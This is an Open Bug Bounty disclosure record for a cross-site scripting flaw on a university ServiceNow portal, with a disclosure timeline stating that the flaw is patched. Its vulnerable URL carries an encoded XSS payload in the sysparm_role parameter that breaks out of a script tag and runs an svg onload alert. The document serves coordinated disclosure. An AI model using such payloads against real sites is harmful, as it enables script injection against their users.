nyu.service-now.com XSS vulnerability

2017-10-13T14:46:00
ID OBB:337600
Type openbugbounty
Reporter TAHA
Modified 2017-11-19T06:01:00

Description

Vulnerable URL:
https://nyu.service-now.com/servicelink/search_results.do?sysparm_ck=911a6e39134ccf44b1a6f107d144b0f691d916cf7cbddc0ed0264c00d36928a153c7f106&sysparm_search=&sysparm_fa=&sysparm_sp=&sysparm_cat=&sysparm_serv=&sysparm_location=&sysparm_role=%3C/script%20%22/*%27/*%3E%3Csvg%20*/;%20onload=alert(1)%20//%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 October, 2017 14:46 GMT
Generic security notifications sent to website owner| 13 October, 2017 14:48 GMT
Notification sent to subscribers (without technical details)| 13 October, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 18 November, 2017 13:45 GMT
Vulnerability patched by the website owner| 19 November, 2017 06:01 GMT